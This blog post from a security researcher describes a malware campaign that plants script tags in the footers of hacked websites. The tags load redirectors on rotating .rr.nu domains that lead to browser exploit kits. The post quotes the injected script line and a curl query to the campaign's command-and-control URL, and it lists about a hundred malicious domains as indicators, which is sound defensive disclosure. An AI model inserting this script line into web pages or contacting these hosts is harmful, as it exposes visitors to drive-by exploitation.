Malware Campaign from .rr.nu

No, they don’t quit, so get used to it! We are seeing quite a few websites being compromised with malware getting loaded from random domains in the .rr.nu TLD.

This is what gets added to the footer of the hacked sites:

<script  src= "http://trill18ionsa.rr.nu/pmg.php?dr=1"></script>

Once loaded, it does another level of redirection to http://ixeld52erlya.rr.nu/n.php?h=1&s=pmg (random domain, but using the parameters h1&s=pmg), which will then attempt to exploit via browser using multiple exploit kits.


Those domains are changing daily, but always pointing to 194.28.114.103. What’s interesting is that the compromised sites also have a backdoor that calls http://www.lilypophilypop.com/g_load.php (their command and control) to get the new list of domains to display.

A quick query of this site shows the current live domains:

$ curl -sq http://www.lilypophilypop.com/g_load.php

http://uotes98satur.rr.nu/

http://ixeld52erlya.rr.nu/

http://ile68depa.rr.nu/

http://cie69svoi.rr.nu/

http://ues02the.rr.nu/

http://ordonv12ectorct.rr.nu/

http://ngv83ete.rr.nu/

http://waranc72hexcit.rr.nu/

http://ereaso88nsphas.rr.nu/

http://erbac03klogwi.rr.nu/

http://rtfall80shesdo.rr.nu/

http://mitexp80ressman.rr.nu/

http://tingst30iffles.rr.nu/

http://ford53blue.rr.nu/

http://trill18ionsa.rr.nu/

Here are domains we have found so far:

aising32austral.rr.nu
anc57erid.rr.nu
ancisc11oretai.rr.nu
arcot97icscch.rr.nu
asu31ryc.rr.nu
atio79srem.rr.nu
ban85kmak.rr.nu
bea90utym.rr.nu
cdeter66minatio.rr.nu
chelpo94landsa.rr.nu
chread73erspar.rr.nu
cie69svoi.rr.nu
dend21ange.rr.nu
deunce68rtaint.rr.nu
dsadva20ntages.rr.nu
eacti41vities.rr.nu
ectors56rushedb.rr.nu
edu11tch.rr.nu
enc89efo.rr.nu
ent70als.rr.nu
ents14publ.rr.nu
erbac03klogwi.rr.nu
ereaso88nsphas.rr.nu
ers49sup.rr.nu
esed94ownu.rr.nu
evaryc13ornerf.rr.nu
ffs06dive.rr.nu
ford53blue.rr.nu
ged20sha.rr.nu
gerd84eckpa.rr.nu
ghl07evel.rr.nu
ibl42efar.rr.nu
ile68depa.rr.nu
ime27glim.rr.nu
ingin64terac.rr.nu
insist18suspen.rr.nu
irdcap79turedre.rr.nu
irstde24clined.rr.nu
iss79ione.rr.nu
itioni67nggene.rr.nu
itsd81evic.rr.nu
ive49scor.rr.nu
ixeld52erlya.rr.nu
jitsu17quakec.rr.nu
king35dayv.rr.nu
lanne44rsacqu.rr.nu
lia82tio.rr.nu
llyim30munity.rr.nu
mitexp80ressman.rr.nu
mputer94izeduni.rr.nu
nadap83artic.rr.nu
ncello05rjuice.rr.nu
ncho61ragef.rr.nu
ngbe82ntse.rr.nu
ngv83ete.rr.nu
nhanc79emayb.rr.nu
nic99wel.rr.nu
nlygpa40rentsre.rr.nu
nom21iesa.rr.nu
nwin54simpl.rr.nu
odity02prince.rr.nu
omist96smoto.rr.nu
onmyse88lfadvis.rr.nu
onth92send.rr.nu
ordonv12ectorct.rr.nu
orkic86kedgra.rr.nu
oul44dbe.rr.nu
pital40relat.rr.nu
quic34kprog.rr.nu
rcles12mainde.rr.nu
renw05insim.rr.nu
rie21rcom.rr.nu
rin43gco.rr.nu
roduc37edter.rr.nu
rpo66rat.rr.nu
rtfall80shesdo.rr.nu
rwest23pasto.rr.nu
sba15gsed.rr.nu
ssurem70ountai.rr.nu
sup01port.rr.nu
syste98msman.rr.nu
tarian13cheese.rr.nu
tel90yget.rr.nu
terda31ytime.rr.nu
tfo04lio.rr.nu
tin04gobs.rr.nu
tingst30iffles.rr.nu
tomoti62veform.rr.nu
trill18ionsa.rr.nu
ttr92acte.rr.nu
ublic19ations.rr.nu
ues02the.rr.nu
untyh37umane.rr.nu
uotes98satur.rr.nu
vesc01hang.rr.nu
vesr27epla.rr.nu
waranc72hexcit.rr.nu

We will post more details as we monitor and can expand.

Let us know in the comments below if you have any questions.

Scan your website for free:
About David Dede

Sucuri Security bot (crazy work) - Malware research updates, sucuri news and more.